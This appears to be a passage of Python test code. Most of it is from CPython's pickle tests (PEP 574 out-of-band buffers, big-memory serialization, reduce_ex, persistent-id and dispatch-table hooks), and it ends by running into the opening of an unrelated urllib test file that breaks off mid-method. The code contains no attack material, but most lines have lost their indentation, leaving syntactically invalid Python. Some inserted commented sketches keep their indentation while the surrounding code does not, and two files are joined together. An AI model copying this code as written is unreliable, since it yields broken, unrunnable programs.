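    @staticmethod
    def _demo_unpicklable_local():
        import pickle
        try:
            pickle.dumps(lambda: None)
        except (pickle.PicklingError, AttributeError):
            pass  # expected: the lambda is not found as a module attribute
        else:
            raise AssertionError("pickling a lambda unexpectedly succeeded")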
#
# PEP 574 tests below
#
def buffer_like_objects(self):
        # Yield buffer-like objects with the bytestring "abcdefgh" in them
bytestring = b"abcdefgh"
yield ZeroCopyBytes(bytestring)
yield ZeroCopyBytearray(bytestring)
if _testbuffer is not None:
items = list(bytestring)
value = int.from_bytes(bytestring, byteorder='little')
for flags in (0, _testbuffer.ND_WRITABLE):
# 1-D, contiguous
yield PicklableNDArray(items, format='B', shape=(8,),
flags=flags)
# 2-D, C-contiguous
yield PicklableNDArray(items, format='B', shape=(4, 2),
strides=(2, 1), flags=flags)
# 2-D, Fortran-contiguous
yield PicklableNDArray(items, format='B',
shape=(4, 2), strides=(1, 4),
flags=flags)
def test_in_band_buffers(self):
# Test in-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(obj, proto)
if obj.c_contiguous and proto >= 5:
# The raw memory bytes are serialized in physical order
self.assertIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 0)
if proto >= 5:
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data),
1 if obj.readonly else 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data),
0 if obj.readonly else 1)
                    # Returning a true value from buffer_callback should have
                    # the same effect
def buffer_callback(obj):
return True
data2 = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertEqual(data2, data)
new = self.loads(data)
# It's a copy
self.assertIsNot(new, obj)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# XXX Unfortunately cannot test non-contiguous array
# (see comment in PicklableNDArray.__reduce_ex__)
def test_oob_buffers(self):
# Test out-of-band buffers (PEP 574)
for obj in self.buffer_like_objects():
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
self.dumps(obj, proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = lambda pb: buffers.append(pb.raw())
data = self.dumps(obj, proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"abcdefgh", data)
self.assertEqual(count_opcode(pickle.SHORT_BINBYTES, data), 0)
self.assertEqual(count_opcode(pickle.BYTEARRAY8, data), 0)
self.assertEqual(count_opcode(pickle.NEXT_BUFFER, data), 1)
self.assertEqual(count_opcode(pickle.READONLY_BUFFER, data),
1 if obj.readonly else 0)
if obj.c_contiguous:
self.assertEqual(bytes(buffers[0]), b"abcdefgh")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
self.loads(data)
new = self.loads(data, buffers=buffers)
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
# Non-sequence buffers accepted too
new = self.loads(data, buffers=iter(buffers))
if obj.zero_copy_reconstruct:
# Zero-copy achieved
self.assertIs(new, obj)
else:
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_oob_buffers_writable_to_readonly(self):
# Test reconstructing readonly object from writable buffer
obj = ZeroCopyBytes(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(obj, proto, buffer_callback=buffer_callback)
buffers = map(bytearray, buffers)
new = self.loads(data, buffers=buffers)
self.assertIs(type(new), type(obj))
self.assertEqual(new, obj)
def test_picklebuffer_error(self):
# PickleBuffer forbidden with protocol < 5
pb = pickle.PickleBuffer(b"foobar")
for proto in range(0, 5):
with self.assertRaises(pickle.PickleError):
self.dumps(pb, proto)
def test_buffer_callback_error(self):
def buffer_callback(buffers):
1/0
pb = pickle.PickleBuffer(b"foobar")
with self.assertRaises(ZeroDivisionError):
self.dumps(pb, 5, buffer_callback=buffer_callback)
def test_buffers_error(self):
pb = pickle.PickleBuffer(b"foobar")
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(pb, proto, buffer_callback=[].append)
            # Non-iterable buffers
with self.assertRaises(TypeError):
self.loads(data, buffers=object())
# Buffer iterable exhausts too early
with self.assertRaises(pickle.UnpicklingError):
self.loads(data, buffers=[])
def test_inband_accept_default_buffers_argument(self):
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
data_pickled = self.dumps(1, proto, buffer_callback=None)
data = self.loads(data_pickled, buffers=None)
@unittest.skipIf(np is None, "Test needs Numpy")
def test_buffers_numpy(self):
def check_no_copy(x, y):
np.testing.assert_equal(x, y)
self.assertEqual(x.ctypes.data, y.ctypes.data)
def check_copy(x, y):
np.testing.assert_equal(x, y)
self.assertNotEqual(x.ctypes.data, y.ctypes.data)
def check_array(arr):
# In-band
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
data = self.dumps(arr, proto)
new = self.loads(data)
check_copy(arr, new)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffer_callback = lambda _: True
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data)
check_copy(arr, new)
# Out-of-band
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = self.dumps(arr, proto, buffer_callback=buffer_callback)
new = self.loads(data, buffers=buffers)
if arr.flags.c_contiguous or arr.flags.f_contiguous:
check_no_copy(arr, new)
else:
check_copy(arr, new)
# 1-D
arr = np.arange(6)
check_array(arr)
# 1-D, non-contiguous
check_array(arr[::2])
# 2-D, C-contiguous
arr = np.arange(12).reshape((3, 4))
check_array(arr)
# 2-D, F-contiguous
check_array(arr.T)
# 2-D, non-contiguous
check_array(arr[::2])
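# Illustrative sketch (not part of the original test suite): a minimal
# out-of-band round trip with the top-level dumps()/loads() API (PEP 574).
# Wrapping the payload in pickle.PickleBuffer makes the bytes travel through
# buffer_callback instead of inside the pickle stream; requires protocol 5.
def _demo_oob_buffers():
    import pickle
    buffers = []
    data = pickle.dumps(pickle.PickleBuffer(b"foobar"), protocol=5,
                        buffer_callback=buffers.append)
    assert b"foobar" not in data            # payload travels out of band
    restored = pickle.loads(data, buffers=buffers)
    assert bytes(restored) == b"foobar"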
class BigmemPickleTests(unittest.TestCase):
# Binary protocols can serialize longs of up to 2 GiB-1
@bigmemtest(size=_2G, memuse=3.6, dry_run=False)
def test_huge_long_32b(self, size):
data = 1 << (8 * size)
try:
for proto in protocols:
if proto < 2:
continue
with self.subTest(proto=proto):
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
finally:
data = None
# Protocol 3 can serialize up to 4 GiB-1 as a bytes object
# (older protocols don't have a dedicated opcode for bytes and are
# too inefficient)
@bigmemtest(size=_2G, memuse=2.5, dry_run=False)
def test_huge_bytes_32b(self, size):
data = b"abcd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES +
struct.pack("<I", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
@bigmemtest(size=_4G, memuse=2.5, dry_run=False)
def test_huge_bytes_64b(self, size):
data = b"acbd" * (size // 4)
try:
for proto in protocols:
if proto < 3:
continue
with self.subTest(proto=proto):
if proto == 3:
# Protocol 3 does not support large bytes objects.
# Verify that we do not crash when processing one.
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINBYTES8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(data)
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
finally:
pickled = None
finally:
data = None
    # All protocols use 1 byte per printable ASCII character; we add another
# byte because the encoded form has to be copied into the internal buffer.
@bigmemtest(size=_2G, memuse=8, dry_run=False)
def test_huge_str_32b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE +
struct.pack("<I", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
# BINUNICODE (protocols 1, 2 and 3) cannot carry more than 2**32 - 1 bytes
# of utf-8 encoded unicode. BINUNICODE8 (protocol 4) supports these huge
# unicode strings however.
@bigmemtest(size=_4G, memuse=8, dry_run=False)
def test_huge_str_64b(self, size):
data = "abcd" * (size // 4)
try:
for proto in protocols:
if proto == 0:
continue
with self.subTest(proto=proto):
if proto < 4:
with self.assertRaises((ValueError, OverflowError)):
self.dumps(data, protocol=proto)
continue
try:
pickled = self.dumps(data, protocol=proto)
header = (pickle.BINUNICODE8 +
struct.pack("<Q", len(data)))
data_start = pickled.index(b'abcd')
self.assertEqual(
header,
pickled[data_start-len(header):data_start])
self.assertEqual((pickled.rindex(b"abcd") + len(b"abcd") -
pickled.index(b"abcd")), len(data))
finally:
pickled = None
finally:
data = None
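# Illustrative sketch (not part of the original test suite): the bigmem tests
# above locate the size header that the pickler writes just before the raw
# payload.  The same check on a small payload, using only the standard library:
def _demo_binbytes_header():
    import pickle
    import struct
    payload = b"abcd" * 100                       # 400 bytes -> BINBYTES opcode
    pickled = pickle.dumps(payload, protocol=3)
    header = pickle.BINBYTES + struct.pack("<I", len(payload))
    start = pickled.index(payload)
    assert pickled[start - len(header):start] == header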
# Test classes for reduce_ex
class REX_one(object):
"""No __reduce_ex__ here, but inheriting it from object"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return REX_one, ()
class REX_two(object):
"""No __reduce__ here, but inheriting it from object"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
class REX_three(object):
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return REX_two, ()
def __reduce__(self):
raise TestFailed("This __reduce__ shouldn't be called")
class REX_four(object):
"""Calling base class method should succeed"""
_proto = None
def __reduce_ex__(self, proto):
self._proto = proto
return object.__reduce_ex__(self, proto)
class REX_five(object):
"""This one used to fail with infinite recursion"""
_reduce_called = 0
def __reduce__(self):
self._reduce_called = 1
return object.__reduce__(self)
class REX_six(object):
"""This class is used to check the 4th argument (list iterator) of
the reduce protocol.
"""
def __init__(self, items=None):
self.items = items if items is not None else []
def __eq__(self, other):
return type(self) is type(other) and self.items == other.items
def append(self, item):
self.items.append(item)
def __reduce__(self):
return type(self), (), None, iter(self.items), None
class REX_seven(object):
"""This class is used to check the 5th argument (dict iterator) of
the reduce protocol.
"""
def __init__(self, table=None):
self.table = table if table is not None else {}
def __eq__(self, other):
return type(self) is type(other) and self.table == other.table
def __setitem__(self, key, value):
self.table[key] = value
def __reduce__(self):
return type(self), (), None, None, iter(self.table.items())
class REX_state(object):
"""This class is used to check the 3th argument (state) of
the reduce protocol.
"""
def __init__(self, state=None):
self.state = state
def __eq__(self, other):
return type(self) is type(other) and self.state == other.state
def __setstate__(self, state):
self.state = state
def __reduce__(self):
return type(self), (), self.state
# Test classes for newobj
class MyInt(int):
sample = 1
class MyFloat(float):
sample = 1.0
class MyComplex(complex):
sample = 1.0 + 0.0j
class MyStr(str):
sample = "hello"
class MyUnicode(str):
sample = "hello \u1234"
class MyTuple(tuple):
sample = (1, 2, 3)
class MyList(list):
sample = [1, 2, 3]
class MyDict(dict):
sample = {"a": 1, "b": 2}
class MySet(set):
sample = {"a", "b"}
class MyFrozenSet(frozenset):
sample = frozenset({"a", "b"})
myclasses = [MyInt, MyFloat,
MyComplex,
MyStr, MyUnicode,
MyTuple, MyList, MyDict, MySet, MyFrozenSet]
class SlotList(MyList):
__slots__ = ["foo"]
class SimpleNewObj(int):
def __init__(self, *args, **kwargs):
# raise an error, to make sure this isn't called
raise TypeError("SimpleNewObj.__init__() didn't expect to get called")
def __eq__(self, other):
return int(self) == int(other) and self.__dict__ == other.__dict__
class ComplexNewObj(SimpleNewObj):
def __getnewargs__(self):
return ('%X' % self, 16)
class ComplexNewObjEx(SimpleNewObj):
def __getnewargs_ex__(self):
return ('%X' % self,), {'base': 16}
class BadGetattr:
def __getattr__(self, key):
self.foo
class AbstractPickleModuleTests(unittest.TestCase):
def test_dump_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.dump, 123, f)
finally:
support.unlink(TESTFN)
def test_load_closed_file(self):
f = open(TESTFN, "wb")
try:
f.close()
self.assertRaises(ValueError, self.load, f)
finally:
support.unlink(TESTFN)
def test_load_from_and_dump_to_file(self):
stream = io.BytesIO()
data = [123, {}, 124]
self.dump(data, stream)
stream.seek(0)
unpickled = self.load(stream)
self.assertEqual(unpickled, data)
def test_highest_protocol(self):
# Of course this needs to be changed when HIGHEST_PROTOCOL changes.
self.assertEqual(pickle.HIGHEST_PROTOCOL, 5)
def test_callapi(self):
f = io.BytesIO()
# With and without keyword arguments
self.dump(123, f, -1)
self.dump(123, file=f, protocol=-1)
self.dumps(123, -1)
self.dumps(123, protocol=-1)
self.Pickler(f, -1)
self.Pickler(f, protocol=-1)
def test_dump_text_file(self):
f = open(TESTFN, "w")
try:
for proto in protocols:
self.assertRaises(TypeError, self.dump, 123, f, proto)
finally:
f.close()
support.unlink(TESTFN)
def test_incomplete_input(self):
s = io.BytesIO(b"X''.")
self.assertRaises((EOFError, struct.error, pickle.UnpicklingError), self.load, s)
def test_bad_init(self):
# Test issue3664 (pickle can segfault from a badly initialized Pickler).
# Override initialization without calling __init__() of the superclass.
class BadPickler(self.Pickler):
def __init__(self): pass
class BadUnpickler(self.Unpickler):
def __init__(self): pass
self.assertRaises(pickle.PicklingError, BadPickler().dump, 0)
self.assertRaises(pickle.UnpicklingError, BadUnpickler().load)
def check_dumps_loads_oob_buffers(self, dumps, loads):
# No need to do the full gamut of tests here, just enough to
# check that dumps() and loads() redirect their arguments
# to the underlying Pickler and Unpickler, respectively.
obj = ZeroCopyBytes(b"foo")
for proto in range(0, 5):
# Need protocol >= 5 for buffer_callback
with self.assertRaises(ValueError):
dumps(obj, protocol=proto,
buffer_callback=[].append)
for proto in range(5, pickle.HIGHEST_PROTOCOL + 1):
buffers = []
buffer_callback = buffers.append
data = dumps(obj, protocol=proto,
buffer_callback=buffer_callback)
self.assertNotIn(b"foo", data)
self.assertEqual(bytes(buffers[0]), b"foo")
# Need buffers argument to unpickle properly
with self.assertRaises(pickle.UnpicklingError):
loads(data)
new = loads(data, buffers=buffers)
self.assertIs(new, obj)
def test_dumps_loads_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dumps() and loads()
self.check_dumps_loads_oob_buffers(self.dumps, self.loads)
def test_dump_load_oob_buffers(self):
# Test out-of-band buffers (PEP 574) with top-level dump() and load()
def dumps(obj, **kwargs):
f = io.BytesIO()
self.dump(obj, f, **kwargs)
return f.getvalue()
def loads(data, **kwargs):
f = io.BytesIO(data)
return self.load(f, **kwargs)
self.check_dumps_loads_oob_buffers(dumps, loads)
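# Illustrative standalone sketch (assumption, not asserted by the tests): the
# PEP 574 round trip outside the test harness looks roughly like
#
#     buffers = []
#     payload = pickle.PickleBuffer(bytearray(b"large binary payload"))
#     data = pickle.dumps(payload, protocol=5, buffer_callback=buffers.append)
#     restored = pickle.loads(data, buffers=buffers)
#
# With a buffer_callback the buffer contents stay out of band; without one
# they are serialized in band.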
class AbstractPersistentPicklerTests(unittest.TestCase):
# This class defines persistent_id() and persistent_load()
# functions that should be used by the pickler. All even integers
# are pickled using persistent ids.
def persistent_id(self, object):
if isinstance(object, int) and object % 2 == 0:
self.id_count += 1
return str(object)
elif object == "test_false_value":
self.false_count += 1
return ""
else:
return None
def persistent_load(self, oid):
if not oid:
self.load_false_count += 1
return "test_false_value"
else:
self.load_count += 1
object = int(oid)
assert object % 2 == 0
return object
def test_persistence(self):
L = list(range(10)) + ["test_false_value"]
for proto in protocols:
self.id_count = 0
self.false_count = 0
self.load_false_count = 0
self.load_count = 0
self.assertEqual(self.loads(self.dumps(L, proto)), L)
self.assertEqual(self.id_count, 5)
self.assertEqual(self.false_count, 1)
self.assertEqual(self.load_count, 5)
self.assertEqual(self.load_false_count, 1)
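# Illustrative sketch (assumption, not used by the test suite): a concrete
# pickler/unpickler pair would typically wire these hooks up like
#
#     class EvenIntPickler(pickle.Pickler):
#         def persistent_id(self, obj):
#             return str(obj) if isinstance(obj, int) and obj % 2 == 0 else None
#
#     class EvenIntUnpickler(pickle.Unpickler):
#         def persistent_load(self, pid):
#             return int(pid)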
class AbstractIdentityPersistentPicklerTests(unittest.TestCase):
def persistent_id(self, obj):
return obj
def persistent_load(self, pid):
return pid
def _check_return_correct_type(self, obj, proto):
unpickled = self.loads(self.dumps(obj, proto))
self.assertIsInstance(unpickled, type(obj))
self.assertEqual(unpickled, obj)
def test_return_correct_type(self):
for proto in protocols:
# Protocol 0 supports only ASCII strings.
if proto == 0:
self._check_return_correct_type("abc", 0)
else:
for obj in [b"abc\n", "abc\n", -1, -1.1 * 0.1, str]:
self._check_return_correct_type(obj, proto)
def test_protocol0_is_ascii_only(self):
non_ascii_str = "\N{EMPTY SET}"
self.assertRaises(pickle.PicklingError, self.dumps, non_ascii_str, 0)
pickled = pickle.PERSID + non_ascii_str.encode('utf-8') + b'\n.'
self.assertRaises(pickle.UnpicklingError, self.loads, pickled)
class AbstractPicklerUnpicklerObjectTests(unittest.TestCase):
pickler_class = None
unpickler_class = None
def setUp(self):
assert self.pickler_class
assert self.unpickler_class
def test_clear_pickler_memo(self):
# To test whether clear_memo() has any effect, we pickle an object,
# then pickle it again without clearing the memo; the two serialized
# forms should be different. If we clear_memo() and then pickle the
# object again, the third serialized form should be identical to the
# first one we obtained.
data = ["abcdefg", "abcdefg", 44]
for proto in protocols:
f = io.BytesIO()
pickler = self.pickler_class(f, proto)
pickler.dump(data)
first_pickled = f.getvalue()
# Reset BytesIO object.
f.seek(0)
f.truncate()
pickler.dump(data)
second_pickled = f.getvalue()
# Reset the Pickler and BytesIO objects.
pickler.clear_memo()
f.seek(0)
f.truncate()
pickler.dump(data)
third_pickled = f.getvalue()
self.assertNotEqual(first_pickled, second_pickled)
self.assertEqual(first_pickled, third_pickled)
def test_priming_pickler_memo(self):
# Verify that we can set the Pickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
self.assertNotEqual(first_pickled, primed_pickled)
def test_priming_unpickler_memo(self):
# Verify that we can set the Unpickler's memo attribute.
data = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data)
first_pickled = f.getvalue()
f = io.BytesIO()
primed = self.pickler_class(f)
primed.memo = pickler.memo
primed.dump(data)
primed_pickled = f.getvalue()
unpickler = self.unpickler_class(io.BytesIO(first_pickled))
unpickled_data1 = unpickler.load()
self.assertEqual(unpickled_data1, data)
primed = self.unpickler_class(io.BytesIO(primed_pickled))
primed.memo = unpickler.memo
unpickled_data2 = primed.load()
primed.memo.clear()
self.assertEqual(unpickled_data2, data)
self.assertTrue(unpickled_data2 is unpickled_data1)
def test_reusing_unpickler_objects(self):
data1 = ["abcdefg", "abcdefg", 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data1)
pickled1 = f.getvalue()
data2 = ["abcdefg", 44, 44]
f = io.BytesIO()
pickler = self.pickler_class(f)
pickler.dump(data2)
pickled2 = f.getvalue()
f = io.BytesIO()
f.write(pickled1)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data1)
f.seek(0)
f.truncate()
f.write(pickled2)
f.seek(0)
self.assertEqual(unpickler.load(), data2)
def _check_multiple_unpicklings(self, ioclass, *, seekable=True):
for proto in protocols:
with self.subTest(proto=proto):
data1 = [(x, str(x)) for x in range(2000)] + [b"abcde", len]
f = ioclass()
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data1)
pickled = f.getvalue()
N = 5
f = ioclass(pickled * N)
unpickler = self.unpickler_class(f)
for i in range(N):
if seekable:
pos = f.tell()
self.assertEqual(unpickler.load(), data1)
if seekable:
self.assertEqual(f.tell(), pos + len(pickled))
self.assertRaises(EOFError, unpickler.load)
def test_multiple_unpicklings_seekable(self):
self._check_multiple_unpicklings(io.BytesIO)
def test_multiple_unpicklings_unseekable(self):
self._check_multiple_unpicklings(UnseekableIO, seekable=False)
def test_multiple_unpicklings_minimal(self):
# File-like object that doesn't support peek() and readinto()
# (bpo-39681)
self._check_multiple_unpicklings(MinimalIO, seekable=False)
def test_unpickling_buffering_readline(self):
# Issue #12687: the unpickler's buffering logic could fail with
# text mode opcodes.
data = list(range(10))
for proto in protocols:
for buf_size in range(1, 11):
f = io.BufferedRandom(io.BytesIO(), buffer_size=buf_size)
pickler = self.pickler_class(f, protocol=proto)
pickler.dump(data)
f.seek(0)
unpickler = self.unpickler_class(f)
self.assertEqual(unpickler.load(), data)
# Tests for dispatch_table attribute
REDUCE_A = 'reduce_A'
class AAA(object):
def __reduce__(self):
return str, (REDUCE_A,)
class BBB(object):
def __init__(self):
# Add an instance attribute to enable state-saving routines at pickling
# time.
self.a = "some attribute"
def __setstate__(self, state):
self.a = "BBB.__setstate__"
def setstate_bbb(obj, state):
"""Custom state setter for BBB objects
Such a callable may be created by someone other than the author of the BBB
class. If passed as the state_setter item of a custom reducer, it allows for
custom state-setting behavior of BBB objects. One can think of it as
analogous to list_setitems or dict_setitems, but for foreign
classes/functions.
"""
obj.a = "custom state_setter"
class AbstractCustomPicklerClass:
"""Pickler implementing a reducing hook using reducer_override."""
def reducer_override(self, obj):
obj_name = getattr(obj, "__name__", None)
if obj_name == 'f':
# asking the pickler to save f as 5
return int, (5, )
if obj_name == 'MyClass':
return str, ('some str',)
elif obj_name == 'g':
# in this case the callback returns an invalid result (not a 2-to-5-item
# tuple or a string), so the pickler should raise a proper error.
return False
elif obj_name == 'h':
# Simulate a case when the reducer fails. The error should
# be propagated to the original ``dump`` call.
raise ValueError('The reducer just failed')
return NotImplemented
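# Illustrative sketch (assumption): a concrete pickler picks this hook up by
# simple mixin composition, e.g.
#
#     class CustomPickler(AbstractCustomPicklerClass, pickle.Pickler):
#         pass
#
# Both the C and pure-Python Pickler consult reducer_override() before falling
# back to their default dispatch (Python 3.8+).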
class AbstractHookTests(unittest.TestCase):
def test_pickler_hook(self):
# test the ability of a custom, user-defined CPickler subclass to
# override the default reducing routines of any type using the method
# reducer_override
def f():
pass
def g():
pass
def h():
pass
class MyClass:
pass
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump([f, MyClass, math.log])
new_f, some_str, math_log = pickle.loads(bio.getvalue())
self.assertEqual(new_f, 5)
self.assertEqual(some_str, 'some str')
# math.log does not have its usual reducer overridden, so the
# custom reduction callback should silently direct the pickler
# to the default pickling by attribute, by returning
# NotImplemented
self.assertIs(math_log, math.log)
with self.assertRaises(pickle.PicklingError):
p.dump(g)
with self.assertRaisesRegex(
ValueError, 'The reducer just failed'):
p.dump(h)
@support.cpython_only
def test_reducer_override_no_reference_cycle(self):
# bpo-39492: reducer_override used to induce a spurious reference cycle
# inside the Pickler object, that could prevent all serialized objects
# from being garbage-collected without explicitly invoking gc.collect().
for proto in range(0, pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto):
def f():
pass
wr = weakref.ref(f)
bio = io.BytesIO()
p = self.pickler_class(bio, proto)
p.dump(f)
new_f = pickle.loads(bio.getvalue())
assert new_f == 5
del p
del f
self.assertIsNone(wr())
class AbstractDispatchTableTests(unittest.TestCase):
def test_default_dispatch_table(self):
# No dispatch_table attribute by default
f = io.BytesIO()
p = self.pickler_class(f, 0)
with self.assertRaises(AttributeError):
p.dispatch_table
self.assertFalse(hasattr(p, 'dispatch_table'))
def test_class_dispatch_table(self):
# A dispatch_table attribute can be specified class-wide
dt = self.get_dispatch_table()
class MyPickler(self.pickler_class):
dispatch_table = dt
def dumps(obj, protocol=None):
f = io.BytesIO()
p = MyPickler(f, protocol)
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def test_instance_dispatch_table(self):
# A dispatch_table attribute can also be specified instance-wide
dt = self.get_dispatch_table()
def dumps(obj, protocol=None):
f = io.BytesIO()
p = self.pickler_class(f, protocol)
p.dispatch_table = dt
self.assertEqual(p.dispatch_table, dt)
p.dump(obj)
return f.getvalue()
self._test_dispatch_table(dumps, dt)
def _test_dispatch_table(self, dumps, dispatch_table):
def custom_load_dump(obj):
return pickle.loads(dumps(obj, 0))
def default_load_dump(obj):
return pickle.loads(pickle.dumps(obj, 0))
# pickling complex numbers using protocol 0 relies on copyreg
# so check pickling a complex number still works
z = 1 + 2j
self.assertEqual(custom_load_dump(z), z)
self.assertEqual(default_load_dump(z), z)
# modify pickling of complex
REDUCE_1 = 'reduce_1'
def reduce_1(obj):
return str, (REDUCE_1,)
dispatch_table[complex] = reduce_1
self.assertEqual(custom_load_dump(z), REDUCE_1)
self.assertEqual(default_load_dump(z), z)
# check picklability of AAA and BBB
a = AAA()
b = BBB()
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# modify pickling of BBB
dispatch_table[BBB] = reduce_1
self.assertEqual(custom_load_dump(a), REDUCE_A)
self.assertEqual(custom_load_dump(b), REDUCE_1)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# revert pickling of BBB and modify pickling of AAA
REDUCE_2 = 'reduce_2'
def reduce_2(obj):
return str, (REDUCE_2,)
dispatch_table[AAA] = reduce_2
del dispatch_table[BBB]
self.assertEqual(custom_load_dump(a), REDUCE_2)
self.assertIsInstance(custom_load_dump(b), BBB)
self.assertEqual(default_load_dump(a), REDUCE_A)
self.assertIsInstance(default_load_dump(b), BBB)
# End-to-end testing of save_reduce with the state_setter keyword
# argument. This is a dispatch_table test as the primary goal of
# state_setter is to tweak objects reduction behavior.
# In particular, state_setter is useful when the default __setstate__
# behavior is not flexible enough.
# No custom reducer for b has been registered for now, so
# BBB.__setstate__ should be used at unpickling time
self.assertEqual(default_load_dump(b).a, "BBB.__setstate__")
def reduce_bbb(obj):
return BBB, (), obj.__dict__, None, None, setstate_bbb
dispatch_table[BBB] = reduce_bbb
# The custom reducer reduce_bbb includes a state setter, that should
# have priority over BBB.__setstate__
self.assertEqual(custom_load_dump(b).a, "custom state_setter")
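# Illustrative sketch (assumption, mirroring the instance-wide variant above):
# outside the test harness an application would typically do
#
#     import copyreg, io
#     dt = copyreg.dispatch_table.copy()
#     dt[complex] = lambda z: (complex, (z.real, z.imag))
#     f = io.BytesIO()
#     p = pickle.Pickler(f, protocol=0)
#     p.dispatch_table = dt
#     p.dump(1 + 2j)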
if __name__ == "__main__":
# Print some stuff that can be used to rewrite DATA{0,1,2}
from pickletools import dis
x = create_data()
for i in range(pickle.HIGHEST_PROTOCOL+1):
p = pickle.dumps(x, i)
print("DATA{0} = (".format(i))
for j in range(0, len(p), 20):
b = bytes(p[j:j+20])
print(" {0!r}".format(b))
print(")")
print()
print("# Disassembly of DATA{0}".format(i))
print("DATA{0}_DIS = \"\"\"\\".format(i))
dis(p)
print("\"\"\"")
print()
|
test_urllib.py
|
"""Regresssion tests for urllib"""
import urllib
import httplib
import unittest
from test import test_support
import os
import mimetools
import tempfile
import StringIO
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
"""Setup of a temp file to use for testing"""
self.text = "test_urllib: %s\n" % self.__class__.__name__
FILE = file(test_support.TESTFN, 'wb')
try:
FILE.write(self.text)
finally:
FILE.close()
self.pathname = test_support.TESTFN
self.returned_obj = urllib.urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(test_support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual('', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), mimetools.Message)
def test_geturl(self):
